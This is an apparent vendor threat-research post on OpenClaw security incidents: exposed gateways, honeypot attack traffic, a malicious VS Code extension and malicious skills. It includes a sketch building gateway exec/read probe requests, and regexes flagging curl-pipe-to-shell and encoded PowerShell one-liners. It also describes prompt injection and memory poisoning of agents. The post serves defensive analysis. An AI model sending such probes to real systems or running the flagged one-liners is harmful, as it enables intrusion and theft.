Acronis
February 23, 2026

OpenClaw: Agentic AI in the wild — Architecture, adoption and emerging security risks

Author: Acronis Threat Research Unit

On this page
What OpenClaw is and how it works
Why OpenClaw is different from typical AI tools
How OpenClaw’s functionality maps to security risks
Practical risk-reduction guidance
What to watch next
Conclusion

Over the past few weeks, OpenClaw has rapidly evolved from a niche open-source project into one of the most widely discussed examples of agentic AI in practice. The idea is simple and compelling: instead of asking an AI questions, you delegate tasks. OpenClaw can read messages, send emails, manage calendars, automate workflows and act across real systems — all through familiar chat interfaces.

This combination of intelligence, autonomy and integration is precisely why OpenClaw has captured attention across developer and security communities. It is also why it has become a focal point for serious security concerns. Unlike traditional chatbots, OpenClaw operates as a privileged agent with access to local systems, credentials and external services. When these systems are misconfigured, impersonated or extended through untrusted components, the resulting security impact can be substantial.

What OpenClaw is and how it works

OpenClaw is an open-source personal AI assistant designed to run locally on a user’s machine. It presents itself primarily through messaging platforms such as WhatsApp, Telegram, Slack, Discord or iMessage, and optionally through a local “Control UI” (also referred to as a canvas or dashboard). From the user’s perspective, OpenClaw feels like a conversational assistant. Under the hood, it is much closer to a local automation platform with an AI-driven control layer.

At the center of the system is the Gateway, a locally running service that brokers communication between chat interfaces, the AI model and tools or “skills.” The Gateway exposes APIs (notably over a WebSocket interface on TCP port 18789) used by the Control UI and other components. OpenClaw’s documentation emphasizes that the Gateway is intended to be accessed locally or through secure tunnels, not exposed directly to the internet.

The agent can be extended through “skills” — effectively packages of executable code and configuration that add new capabilities. Once enabled, skills may interact with the local filesystem, network and connected services. Persistent memory allows OpenClaw to retain context and personalization across sessions, which is a key part of its appeal as a long-lived assistant.

This design enables powerful workflows. It also creates a security model that is fundamentally different from that of traditional SaaS AI tools.

Why OpenClaw is different from typical AI tools

Most consumer AI systems are stateless or narrowly scoped. OpenClaw is explicitly stateful, integrated and empowered to act. It can store credentials, remember conversations, execute commands and communicate externally on behalf of the user. As several security researchers have noted, this effectively turns the agent into a new kind of privileged identity.

The risk is not that OpenClaw “uses AI,” but that it combines three properties in a single system:

  1. Access to sensitive data and credentials.
  2. Exposure to untrusted input (especially via messaging platforms).
  3. The ability to take autonomous actions and communicate externally.

This combination dramatically increases the blast radius of misconfigurations, social engineering or supply chain compromise.

Over a very short period of time, multiple independent security teams, including Acronis, analyzed OpenClaw deployments and its growing ecosystem. The findings are notable not because they reveal obscure vulnerabilities, but because they show how quickly real-world risks emerge when agentic AI systems meet internet-scale adoption.

Pillar Security honeypot: Exposed gateways were attacked as an API service, not as an “AI bot”

Pillar Security set up a honeypot that mimicked a Clawdbot / Moltbot gateway (OpenClaw’s earlier names) and saw protocol-aware exploitation within minutes / hours. The key point: many attackers skipped prompt injection entirely and went straight to the gateway’s WebSocket API on TCP/18789, treating it like a remotely exploitable control plane.

What attackers targeted

  • Authentication gaps / bypass paths in real-world deployments (especially reverse proxies).
  • Downgrading protocol versions to hit older behavior.
  • Raw tool execution / file reads via JSON-RPC / MCP-style payloads.
  • Credential and token harvesting (LLM API keys, chat tokens, gateway creds), plus conversation history.

How it was executed

  1. Reach the gateway on port 18789 and attempt to connect as a legitimate client (e.g., spoofing “control UI”).
  2. Exploit “auth defaults to none”: Pillar shows that when gateway.auth.token or gateway.auth.password wasn’t set, the gateway could allow unauthenticated access (fixed January 26, 2026).
  3. Exploit reverse proxy trust: Gateways behind nginx/Caddy/Traefik could treat proxied traffic as “localhost,” allowing auth bypass unless gateway.trustedProxies is configured (fixed January 26, 2026).
  4. Protocol downgrade attempts: Attackers tried minProtocol/maxProtocol: 1 to target prepatch behavior.
  5. Command + file-access probes using JSON-RPC “tool exec/read” patterns (examples Pillar captured include whoami, reading /etc/os-release, and attempts to list/read session logs under ~/.clawdbot/.../sessions/*.jsonl).

This is not a theoretical prompt‑injection risk; it reflects the same exploitation paths seen in internet‑exposed administrative APIs: enumerate → downgrade → impersonate client → execute/read → steal tokens → persist. Pillar explicitly notes that attackers’ probes mapped to real handlers and looked as though the attackers had read the source.
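
The probe traffic Pillar describes can be illustrated with a minimal sketch. The method names and parameter shapes below are hypothetical — the report does not publish the gateway’s exact schema — but the point stands: these are ordinary structured API messages, not AI prompts.

```python
import json

# Hypothetical reconstruction of a gateway probe sequence.
# Method names and fields are illustrative, not OpenClaw's actual schema.

def make_probe(probe_id: int, method: str, params: dict) -> str:
    """Build a JSON-RPC 2.0 request of the kind seen against exposed gateways."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": probe_id,
        "method": method,
        "params": params,
    })

# Step 4 from the list above: request an old protocol version.
downgrade = make_probe(1, "session.connect", {"minProtocol": 1, "maxProtocol": 1})

# Step 5: command-execution and file-read probes.
exec_probe = make_probe(2, "tool.exec", {"command": "whoami"})
read_probe = make_probe(3, "tool.read", {"path": "/etc/os-release"})

for raw in (downgrade, exec_probe, read_probe):
    msg = json.loads(raw)
    print(msg["method"], "->", msg["params"])
```

From a defender’s perspective, the takeaway is that such traffic is plain JSON over a WebSocket and can be logged and alerted on like any other administrative API.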

Censys mapping: The risk isn’t only “a bug,” it’s mass internet exposure at viral scale

Censys reports adoption jumping from ~1,000 to 21,000+ publicly exposed instances in under a week (as of January 31, 2026).

The security issue Censys highlights: OpenClaw is intended to run locally on TCP/18789 or be accessed via protective mechanisms such as SSH or Cloudflare Tunnel, but many users exposed it directly on the public internet.

Aikido: Malicious VS Code extension impersonated OpenClaw / Clawdbot and dropped a real remote-access implant

Aikido documented a malicious VS Code Marketplace extension named “ClawdBot Agent” (January 27, 2026). It looked legitimate and even “worked,” but installed a remote access payload on Windows as soon as VS Code started.

How it was executed

  • The extension registers an automatic startup trigger (activationEvents: ["onStartupFinished"]) so it runs every time VS Code starts with no clicks.
  • It pulls a config from attacker infrastructure (Aikido shows a config.json file list including Code.exe, DWrite.dll, etc.).
  • The dropped Code.exe was identified as ConnectWise ScreenConnect, a legitimate remote management tool — but configured to connect to the attacker’s relay server, so victims “phone home” immediately.
  • Aikido extracted embedded settings showing the relay host and port (example shown: meeting.bulletmailer[.]net with port 8041), plus an RSA key parameter — meaning the installer was prebound to attacker infrastructure.
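
A defensive takeaway from this case: extensions that declare the `onStartupFinished` activation event run silently at every editor launch, and that declaration is visible in each extension’s package.json. A rough audit sketch follows; the extensions directory path is VS Code’s standard default and may differ on your setup.

```python
import json
from pathlib import Path

def startup_extensions(ext_dir: Path) -> list[str]:
    """List installed extensions that declare an automatic startup trigger —
    the same activation mechanism the malicious "ClawdBot Agent" used."""
    flagged = []
    for manifest in ext_dir.glob("*/package.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue
        events = data.get("activationEvents", [])
        if "onStartupFinished" in events or "*" in events:
            flagged.append(manifest.parent.name)
    return sorted(flagged)

# Typical location on Linux/macOS; on Windows use %USERPROFILE%\.vscode\extensions.
# print(startup_extensions(Path.home() / ".vscode" / "extensions"))
```

Startup activation is legitimate for many extensions, so the output is a review list, not a verdict — but anything unfamiliar on it deserves a closer look.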

Defense evasion and resilience: Aikido describes a redundant chain:

  • A Rust-based DLL (DWrite.dll) used DLL sideloading and could fetch payloads from Dropbox if primary infrastructure failed.
  • The JavaScript includes hardcoded fallback URLs; plus, a run.bat path provides yet another fallback route.

This is a textbook “viral open-source brand → ecosystem abuse” pattern: Attackers didn’t need to compromise OpenClaw itself; they hijacked the attention wave and delivered malware through an adjacent distribution channel.

Malicious “skills” on ClawHub: Extensions weren’t sandboxed, and attackers relied on “copy-paste this command” social engineering

Tom’s Hardware reports that 14 malicious skills were uploaded to ClawHub between January 27–29. They masqueraded as crypto-wallet automation tools.

Key technical risk: Skills run as real code

Skills in this ecosystem are not “safe scripts”; they are folders of executable code that can interact with the local file system and network once installed and enabled.

How the attack worked

  • The skills used social engineering during “setup”: prompts to run obfuscated terminal one-liners that fetched and executed remote scripts.
  • The intent (per the reporting) was to harvest browser data and crypto-wallet information, targeting Windows and macOS.
  • One malicious skill even appeared on ClawHub’s front page before removal, increasing accidental installs.

If a “skill” can run code, plus the agent has access to secrets / tokens, the skill becomes a privileged execution vector that users opt into because it “adds features.”
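
Before enabling a skill, it is worth treating its setup instructions as code under review. A crude but useful heuristic is to flag the patterns seen in the ClawHub incident: obfuscated one-liners that pipe downloaded content straight into a shell. A minimal sketch, with illustrative (not exhaustive) patterns:

```python
import re

# Illustrative red-flag patterns, modeled on the "paste this one-liner"
# social engineering reported in the ClawHub incident. Not exhaustive.
RED_FLAGS = [
    re.compile(r"curl[^|\n]*\|\s*(ba)?sh"),   # download piped straight into a shell
    re.compile(r"wget[^|\n]*\|\s*(ba)?sh"),
    re.compile(r"base64\s+(-d|--decode)"),     # decode-then-execute obfuscation
    re.compile(r"powershell[^\n]*-enc", re.IGNORECASE),  # encoded PowerShell
]

def suspicious_lines(text: str) -> list[str]:
    """Return setup-instruction lines matching any red-flag pattern."""
    return [
        line.strip()
        for line in text.splitlines()
        if any(p.search(line) for p in RED_FLAGS)
    ]

setup = "Step 1: run `curl -s https://example.invalid/i.sh | bash` to install"
print(suspicious_lines(setup))
```

A match is a reason to stop and read the fetched script, not proof of malice — but legitimate skills rarely need a user to execute opaque one-liners.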

Malwarebytes: Impersonation via typosquats + cloned repos — “Clean code today lowers suspicion tomorrow”

Malwarebytes described a fast-moving impersonation campaign after the name change (Clawdbot → Moltbot), including typosquat domains and a cloned GitHub repo impersonating the creator.

Malwarebytes explicitly says the absence of malware was the strategy: the cloned repo could look clean and pass audit now so users would install it, then configure it with API keys and tokens — establishing trust and setting up a future supply chain attack opportunity.

How OpenClaw’s functionality maps to security risks

This section is the “threat model” translation: feature → risk → how it shows up in the real world.

Messaging integrations (WhatsApp, Telegram, Slack, etc.)

What it enables: convenient “chat-as-UI” control plane; potentially also operation in groups or channels.

Core risks:

  • Prompt injection via untrusted messages (malicious instructions embedded in normal-looking text).
  • Impersonation / social engineering (“hey, run this setup step,” “install this skill,” “click this link”).
  • Cross-channel data leakage (agent accidentally forwards content between accounts or channels).

Cisco specifically flags the messaging surface as expanding the attack surface and enabling malicious prompts.

Local gateway + remote exposure

What it enables: a daemon / dashboard that orchestrates sessions, channels, tools and events; local-first, but often self-hosted.

Core risks:

  • Unauthenticated or weakly authenticated remote access (internet-exposed control plane).
  • Credential leakage (API keys, OAuth tokens, chat histories).
  • Direct command execution if the control plane exposes tool endpoints.

This is not hypothetical: Censys measured 21k+ exposed instances (January 31, 2026). Pillar Security describes real-world probing / attack traffic against exposed gateways.

“Skills” / plugins / extensions ecosystem

What it enables: extending capabilities via third-party code and instructions (registries, downloadable skills).

Core risks:

  • Supply chain compromise (malicious skills / extensions distributed under hype).
  • Privilege amplification (a “skill” is effectively executable code with file system or network access once installed).
  • Hidden behavior (exfiltration, backdoors, credential harvesters).

Tom’s Hardware reports skills “are not sandboxed scripts but folders of executable code” with local file system / network interaction once enabled.

Cisco’s writeup underscores that installing a malicious or injected skill is equivalent to granting harmful capabilities.

Persistent memory plus long-term context

What it enables: personalization and continuity across sessions (a big part of the “it feels like a real assistant” appeal).

Core risks:

  • Sensitive data accumulation (the assistant becomes a single high-value data store).
  • Memory poisoning (attacker plants instructions or false “facts” that persist).
  • Cross-context leakage (private info reused in the wrong place).

Even when running locally, persistent memory increases blast radius: Compromise once, benefit for a long time.

Autonomous actions (“Do things,” schedule, execute)

What it enables: proactive workflows (email triage, calendar ops, trading experiments, etc.).

Core risks:

  • High-speed failure modes (small mistake repeated at scale).
  • Delegation risk (users grant excessive permissions “to see what it can do”).
  • Semantic attacks that don’t look like malware (hard for traditional controls).

VentureBeat emphasizes that this class of threat is “semantic rather than syntactic,” and highlights Willison’s “lethal trifecta” framing (private data access + untrusted content + external communication).

Practical risk-reduction guidance

This is not a recommendation to avoid the technology; instead, it outlines how to use it safely without turning your digital life into a lab accident.

For individual users / researchers

  • Keep the gateway local only, unless you really understand the exposure path; treat port exposure as a critical risk.
  • Treat inbound messages as untrusted input and avoid enabling group / channel control on accounts where strangers can message it. 
  • Only install skills or extensions you can review like any other executable dependency; don’t run “paste this one-liner” setup steps from random sources.
  • Use separate, least-privilege accounts / tokens (email, Slack, etc.) so compromise doesn’t equal “everything.” Over-permissioning is a fundamental failure mode.
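
The first bullet can be verified mechanically. The sketch below checks whether a given host answers on the gateway port (18789, per the documentation cited earlier); running it from a second machine, or against your public IP, is a quick way to confirm the gateway is not reachable beyond loopback.

```python
import socket

GATEWAY_PORT = 18789  # OpenClaw's documented default gateway port

def port_reachable(host: str, port: int = GATEWAY_PORT, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

# Run from another machine (or against your public IP), e.g.:
# if port_reachable("203.0.113.10"):
#     print("Gateway port reachable from outside -- treat as critical exposure.")
```

A successful connection from outside your network means the control plane is internet-facing and should be moved behind SSH, a tunnel or a firewall immediately.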

For companies (where “shadow OpenClaw” is the real risk)

  • Assume developers are experimenting already and prioritize visibility: Look for exposed gateways, unusual bot identities or new OAuth grants.
  • Model agent deployments as privileged identities: Log agent actions, scope credentials tightly and restrict what data an agent can read vs. where it can send.
  • Harden “skills” as a supply chain: Treat them like packages, with reviews, signing / allowlists and scanning. Scan skills for dangerous code as well as for risks hidden in metadata / instructions.
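
The allowlisting idea in the last bullet can be sketched simply: pin each approved skill to a content hash and refuse anything that drifts. The helper names below are illustrative, not part of any OpenClaw tooling.

```python
import hashlib
from pathlib import Path

def skill_digest(skill_dir: Path) -> str:
    """SHA-256 over every file in the skill folder, in a stable order,
    so any changed, added or removed file changes the digest."""
    h = hashlib.sha256()
    for f in sorted(skill_dir.rglob("*")):
        if f.is_file():
            h.update(f.relative_to(skill_dir).as_posix().encode())
            h.update(f.read_bytes())
    return h.hexdigest()

def is_approved(skill_dir: Path, allowlist: dict[str, str]) -> bool:
    """Allow a skill only if its digest matches the reviewed version."""
    return allowlist.get(skill_dir.name) == skill_digest(skill_dir)
```

Hash pinning does not make a reviewed skill safe, but it does guarantee that what runs tomorrow is byte-for-byte what was reviewed today — directly countering the “clean code today, swap later” pattern Malwarebytes describes.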

What to watch next

Based on the findings described above, the next security “inflection points” are likely to be:

  • Whether default auth / safe remote access becomes truly foolproof (and how quickly exposed instance counts fall).
  • Whether the skills ecosystem gains stronger trust signals (verification, signing, moderation) after malware incidents.
  • Whether OpenClaw (and peers) can meaningfully mitigate prompt injection in high-privilege, multichannel environments — a challenge that even mainstream coverage flags as “shockingly easy” via chat surfaces if misused.

Conclusion

OpenClaw demonstrates that agentic AI is no longer theoretical. It works, it scales and people want it. At the same time, recent research shows that when intelligence, autonomy and integration converge, security assumptions must change.

The incidents observed so far — exposed gateways, impersonation malware, malicious extensions and supply chain abuse — are not failures unique to OpenClaw. They are early indicators of the challenges that will accompany the broader adoption of agentic AI systems.

For security teams, the lesson is not to block innovation, but to recognize that these agents are new high-privilege entities. They require the same level of scrutiny as remote administration tools and, in many cases, greater oversight.